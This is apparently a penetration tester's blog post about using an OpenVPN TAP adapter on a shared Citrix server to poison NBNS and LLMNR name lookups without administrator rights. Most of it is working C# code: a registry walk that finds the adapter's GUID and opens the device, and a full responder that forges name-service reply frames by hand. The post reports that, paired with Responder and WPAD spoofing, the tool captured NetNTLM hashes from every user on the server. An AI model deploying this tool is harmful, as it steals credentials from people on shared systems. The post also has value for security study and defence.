One problem with Responder and similar tools is that running them as a low-privilege user on a Windows box is damned near impossible. Windows already has the ports they need bound (UDP 137 for NBNS, UDP 5355 for LLMNR), so any form of poisoning isn't going to work.

Recently I was playing with a shared Citrix server and noticed that someone had installed OpenVPN, so the TAP adapter it installs was present.

I started thinking about ways to have fun with this. I couldn't make connections out of the network for other reasons, so I thought "what if I write a tool that pretends to be a network?"

I found some articles about using TAP adapters from C#; it's not too tough, but it relies on P/Invoke to native methods to open and drive the device. The main problem is that as a low-privilege user it's hard to find the adapter's GUID, because most registry keys that definitively identify it aren't readable. For example, most of the driver configuration is kept under HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Class\{4D36E972-E325-11CE-BFC1-08002BE10318}, but the individual per-adapter subkeys there can't be read by a standard user.

After some digging about in the registry you can find the GUID by cycling over the {GUID} subkeys of HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Network\{4D36E972-E325-11CE-BFC1-08002BE10318} and reading the Name value under each one's Connection subkey, which holds the connection name shown in Network Connections. Those keys are readable by standard users.
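As an added illustration (my code, not the tool from the post), here is that registry walk together with the native calls needed to open the adapter afterwards. It assumes the TAP-Windows driver's device naming (\\.\Global\{GUID}.tap) and its TAP_IOCTL_SET_MEDIA_STATUS control code (0x220018, i.e. CTL_CODE(FILE_DEVICE_UNKNOWN, 6, METHOD_BUFFERED, FILE_ANY_ACCESS)); the name fragment to match is a command-line argument, and the NetworkInterface cross-check is an alternative the post does not mention:

```csharp
using System;
using System.IO;
using System.Net.NetworkInformation;
using System.Runtime.InteropServices;
using Microsoft.Win32;
using Microsoft.Win32.SafeHandles;

// Added example (not the post's tool): find a TAP-Windows adapter's GUID as a low-privilege user
// and open its device node ready for raw frame I/O.
static class TapFinder
{
    // Network class key: its {GUID} subkeys and their Connection\Name values are readable by
    // standard users, unlike the driver details under Control\Class.
    const string NetworkKey = @"SYSTEM\CurrentControlSet\Control\Network\{4D36E972-E325-11CE-BFC1-08002BE10318}";

    // Lists every adapter GUID with its connection name and returns the first whose name contains
    // `nameFragment` (case-insensitive), or null if none matches.
    public static string FindAdapterGuid(string nameFragment)
    {
        string match = null;
        using (RegistryKey net = Registry.LocalMachine.OpenSubKey(NetworkKey))
        {
            if (net == null) return null;
            foreach (string guid in net.GetSubKeyNames())
            {
                using (RegistryKey conn = net.OpenSubKey(guid + @"\Connection"))
                {
                    if (conn == null) continue;                              // e.g. the "Descriptions" subkey
                    string name = conn.GetValue("Name") as string;
                    string pnp = conn.GetValue("PnpInstanceID") as string;  // TAP is root-enumerated (ROOT\NET\000x)
                    Console.WriteLine("{0}  {1,-30} {2}", guid, name, pnp);
                    if (match == null && name != null &&
                        name.IndexOf(nameFragment, StringComparison.OrdinalIgnoreCase) >= 0)
                        match = guid;
                }
            }
        }
        return match;
    }

    // Cross-check that needs no registry access at all: the IP Helper API exposes the same GUID as
    // NetworkInterface.Id together with the driver description the Class key would not let us read.
    public static string FindByDescription(string fragment)
    {
        foreach (NetworkInterface nic in NetworkInterface.GetAllNetworkInterfaces())
            if (nic.Description.IndexOf(fragment, StringComparison.OrdinalIgnoreCase) >= 0)
                return nic.Id;
        return null;
    }

    [DllImport("kernel32.dll", SetLastError = true, CharSet = CharSet.Unicode)]
    static extern SafeFileHandle CreateFile(string name, uint access, uint share, IntPtr sec,
                                            uint disposition, uint flags, IntPtr template);
    [DllImport("kernel32.dll", SetLastError = true)]
    static extern bool DeviceIoControl(SafeFileHandle h, uint code, ref int inBuf, int inLen,
                                       IntPtr outBuf, int outLen, out int returned, IntPtr overlapped);

    const uint GENERIC_READ = 0x80000000, GENERIC_WRITE = 0x40000000, OPEN_EXISTING = 3, FILE_ATTRIBUTE_SYSTEM = 0x4;
    const uint TAP_IOCTL_SET_MEDIA_STATUS = 0x220018;  // assumed from the TAP-Windows driver: CTL_CODE(FILE_DEVICE_UNKNOWN, 6, ...)

    // Opens \\.\Global\{GUID}.tap and tells the driver the cable is plugged in. Each Read() on the
    // returned stream then yields one raw Ethernet frame the host sent out; each Write() injects one.
    public static FileStream OpenTap(string guid)
    {
        SafeFileHandle h = CreateFile(@"\\.\Global\" + guid + ".tap", GENERIC_READ | GENERIC_WRITE, 0,
                                      IntPtr.Zero, OPEN_EXISTING, FILE_ATTRIBUTE_SYSTEM, IntPtr.Zero);
        if (h.IsInvalid) throw new IOException("CreateFile failed, error " + Marshal.GetLastWin32Error());
        int connected = 1, returned;
        if (!DeviceIoControl(h, TAP_IOCTL_SET_MEDIA_STATUS, ref connected, sizeof(int), IntPtr.Zero, 0, out returned, IntPtr.Zero))
            throw new IOException("SET_MEDIA_STATUS failed, error " + Marshal.GetLastWin32Error());
        return new FileStream(h, FileAccess.ReadWrite, 1, false);   // bufferSize 1: no internal buffering, every Write() hits the driver
    }

    static void Main(string[] args)
    {
        string fragment = args.Length > 0 ? args[0] : "TAP";
        string guid = FindAdapterGuid(fragment) ?? FindByDescription(fragment);
        if (guid == null) { Console.WriteLine("no adapter matching '" + fragment + "'"); return; }
        using (FileStream tap = OpenTap(guid))
        {
            byte[] buf = new byte[1600];
            int n = tap.Read(buf, 0, buf.Length);      // blocks until the host sends a frame out of the adapter
            Console.WriteLine("{0}: read {1}-byte frame, EtherType 0x{2:X2}{3:X2}", guid, n, buf[12], buf[13]);
        }
    }
}
```

Two practical points: the TAP device only allows one open handle, so CreateFile fails if OpenVPN currently has the adapter in use, and the Windows stack only sends name queries out of the adapter once it has an address on it, which is a configuration detail the post does not go into.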

Once the GUID was found the tool could open the TAP adapter's device and start reading frames from and pushing frames to the NIC. The first thing I wrote was a simple NBNS/LLMNR responder; as the data coming out of the adapter is raw Ethernet frames, I had some fun writing packets (Ethernet, IPv4 and UDP headers included) by hand.
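The responder logic in outline, as an added example rather than the post's code: it takes a frame read from the TAP device, recognises an IPv4/UDP LLMNR or NBNS name query, and builds the complete reply frame by hand, IPv4 header checksum included. The MAC and IP addresses, the 30 s and 165 s TTLs and the constructed "wpad" query in Main are my choices, not values from the post:

```csharp
using System;
using System.Net;

// Added example (not the post's tool): answer NBNS/LLMNR name queries read as raw Ethernet frames from
// a TAP adapter, telling the querier that `answerIp` owns whatever name it asked for.
static class NameSpoofer
{
    // Returns a complete Ethernet frame answering the query in `frame`, or null if the frame is not an
    // IPv4/UDP LLMNR (5355) or NBNS (137) name query. `ourMac`/`ourIp` are the fake network-side
    // identity the reply comes from; `answerIp` is the address the name should resolve to.
    public static byte[] BuildResponse(byte[] frame, byte[] ourMac, IPAddress ourIp, IPAddress answerIp)
    {
        if (frame.Length < 42 || frame[12] != 0x08 || frame[13] != 0x00) return null;        // IPv4 only
        int ipOff = 14, ihl = (frame[ipOff] & 0x0F) * 4, udpOff = ipOff + ihl;
        if ((frame[ipOff] >> 4) != 4 || frame[ipOff + 9] != 17 || udpOff + 8 > frame.Length) return null; // UDP only
        int udpLen = (frame[udpOff + 4] << 8) | frame[udpOff + 5];
        int srcPort = (frame[udpOff] << 8) | frame[udpOff + 1], dstPort = (frame[udpOff + 2] << 8) | frame[udpOff + 3];
        if (udpLen < 20 || udpOff + udpLen > frame.Length) return null;                      // 8 UDP + 12 name-service header
        byte[] q = Slice(frame, udpOff + 8, udpLen - 8);
        byte[] answer = dstPort == 5355 ? LlmnrAnswer(q, answerIp) : dstPort == 137 ? NbnsAnswer(q, answerIp) : null;
        if (answer == null) return null;
        // Unicast the answer straight back to the querier: swap MACs, IPs and ports.
        return Encapsulate(Slice(frame, 6, 6), ourMac, ourIp.GetAddressBytes(), Slice(frame, ipOff + 12, 4),
                           dstPort, srcPort, answer);
    }

    // LLMNR (RFC 4795) is DNS-shaped: answer standard A queries with one question by echoing the question
    // section and appending one A record with the name spelled out again (no compression pointer needed).
    static byte[] LlmnrAnswer(byte[] q, IPAddress ip)
    {
        if ((q[2] & 0xF8) != 0 || q[4] != 0 || q[5] != 1) return null;                      // QR=0, opcode 0, QDCOUNT=1
        int nameEnd = 12;
        while (nameEnd < q.Length && q[nameEnd] != 0) nameEnd += q[nameEnd] + 1;             // walk the labels
        int qEnd = nameEnd + 5;                                                              // root label + QTYPE + QCLASS
        if (qEnd > q.Length || q[nameEnd + 1] != 0 || q[nameEnd + 2] != 1) return null;      // A queries only
        int nameLen = qEnd - 16, o = qEnd;
        var r = new byte[qEnd + nameLen + 14];                                               // + TYPE, CLASS, TTL, RDLENGTH, RDATA
        Array.Copy(q, 0, r, 0, qEnd); r[2] = 0x80; r[3] = 0; r[7] = 1;                       // copy ID+question; QR=1; ANCOUNT=1
        Array.Copy(q, 12, r, o, nameLen); o += nameLen;
        r[o++] = 0; r[o++] = 1; r[o++] = 0; r[o++] = 1;                                       // TYPE A, CLASS IN
        r[o++] = 0; r[o++] = 0; r[o++] = 0; r[o++] = 30; r[o++] = 0; r[o++] = 4;             // TTL 30 s, RDLENGTH 4
        Array.Copy(ip.GetAddressBytes(), 0, r, o, 4);
        return r;
    }

    // NBNS name query (RFC 1002): 50 bytes, the 16-byte NetBIOS name half-byte encoded into 32 chars behind a
    // 0x20 length byte. A positive name response repeats that name, then one NB record with flags + IP.
    static byte[] NbnsAnswer(byte[] q, IPAddress ip)
    {
        if (q.Length < 50 || (q[2] & 0x80) != 0 || q[5] != 1 || q[12] != 0x20 || q[46] != 0 || q[47] != 0x20) return null;
        var r = new byte[62];
        r[0] = q[0]; r[1] = q[1]; r[2] = 0x85; r[3] = 0; r[7] = 1;                           // transaction ID; response+AA+RD; ANCOUNT=1
        Array.Copy(q, 12, r, 12, 34);                                                        // encoded name incl. 0x20 and trailing 0
        int o = 46;
        r[o++] = 0; r[o++] = 0x20; r[o++] = 0; r[o++] = 1;                                    // TYPE NB, CLASS IN
        r[o++] = 0; r[o++] = 0; r[o++] = 0; r[o++] = 0xA5; r[o++] = 0; r[o++] = 6;           // TTL 165 s, RDLENGTH 6
        r[o++] = 0; r[o++] = 0;                                                              // NB_FLAGS: unique name, B-node
        Array.Copy(ip.GetAddressBytes(), 0, r, o, 4);
        return r;
    }

    // Wraps `payload` in UDP, IPv4 (with a correct header checksum) and Ethernet. The UDP checksum is left
    // as zero, which IPv4 permits, so only the IP header checksum has to be computed by hand.
    static byte[] Encapsulate(byte[] dstMac, byte[] srcMac, byte[] srcIp, byte[] dstIp, int srcPort, int dstPort, byte[] payload)
    {
        int udpLen = 8 + payload.Length, ipLen = 20 + udpLen;
        var f = new byte[14 + ipLen];
        Array.Copy(dstMac, 0, f, 0, 6); Array.Copy(srcMac, 0, f, 6, 6); f[12] = 0x08;       // EtherType 0x0800
        f[14] = 0x45; f[16] = (byte)(ipLen >> 8); f[17] = (byte)ipLen;                        // v4, IHL 5, total length
        f[20] = 0x40; f[22] = 128; f[23] = 17;                                               // DF, TTL, protocol UDP
        Array.Copy(srcIp, 0, f, 26, 4); Array.Copy(dstIp, 0, f, 30, 4);
        ushort sum = Checksum(f, 14, 20); f[24] = (byte)(sum >> 8); f[25] = (byte)sum;
        f[34] = (byte)(srcPort >> 8); f[35] = (byte)srcPort; f[36] = (byte)(dstPort >> 8); f[37] = (byte)dstPort;
        f[38] = (byte)(udpLen >> 8); f[39] = (byte)udpLen;
        Array.Copy(payload, 0, f, 42, payload.Length);
        return f;
    }

    // Internet one's-complement checksum over `len` bytes at `off` (the checksum field itself must be 0).
    static ushort Checksum(byte[] b, int off, int len)
    {
        uint sum = 0;
        for (int i = 0; i + 1 < len; i += 2) sum += (uint)((b[off + i] << 8) | b[off + i + 1]);
        if ((len & 1) != 0) sum += (uint)(b[off + len - 1] << 8);
        while ((sum >> 16) != 0) sum = (sum & 0xFFFF) + (sum >> 16);
        return (ushort)~sum;
    }

    static byte[] Slice(byte[] b, int off, int len) { var s = new byte[len]; Array.Copy(b, off, s, 0, len); return s; }

    // Constructed sample input: an LLMNR A query for "wpad" from 10.8.0.2 to 224.0.0.252, as the TAP adapter
    // would hand it to us. Main answers it with 10.8.0.1 and prints the frame that would be written back.
    static void Main()
    {
        byte[] name = { 4, (byte)'w', (byte)'p', (byte)'a', (byte)'d', 0 };
        var q = new byte[12 + name.Length + 4];
        q[0] = 0x12; q[1] = 0x34; q[5] = 1; Array.Copy(name, 0, q, 12, name.Length);        // ID, QDCOUNT=1, QNAME
        q[12 + name.Length + 1] = 1; q[12 + name.Length + 3] = 1;                            // QTYPE A, QCLASS IN
        byte[] query = Encapsulate(new byte[] { 0x01, 0x00, 0x5E, 0x00, 0x00, 0xFC }, new byte[] { 0x00, 0xFF, 0x11, 0x22, 0x33, 0x44 },
                                   new byte[] { 10, 8, 0, 2 }, new byte[] { 224, 0, 0, 252 }, 51000, 5355, q);
        byte[] reply = BuildResponse(query, new byte[] { 0x00, 0xFF, 0xAA, 0xBB, 0xCC, 0xDD },
                                     IPAddress.Parse("10.8.0.1"), IPAddress.Parse("10.8.0.1"));
        Console.WriteLine(BitConverter.ToString(reply));   // in the real tool: tap.Write(reply, 0, reply.Length)
    }
}
```

The reply's destination MAC and IP are simply the query's source, i.e. the TAP adapter itself, which is why this works for any local user: the Windows stack accepts whatever arrives from the "network" side of the adapter regardless of who opened the device. If `answerIp` is a host on the real network running Responder, the victim's subsequent WPAD HTTP request goes there and Responder does the rest. IPv6 LLMNR (ff02::1:3) and AAAA queries are deliberately ignored here.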

This appeared to work well: since there is virtually zero latency between the broadcast request leaving the TAP adapter and our response coming back, the poisoner always beats any legitimate answer. Couple this with a copy of Responder running somewhere else (with the spoofed WPAD answer pointing at it) and WPAD poisoning is possible; on the first test it dumped NetNTLM hashes for every person currently using the Citrix server 🙂

The code is a mess but available here. It's a Visual Studio project but entirely in one source file, so it's easy to drop the .cs file on a server and compile it with csc.exe, which ships with the .NET Framework, so no extra tooling is needed on the target.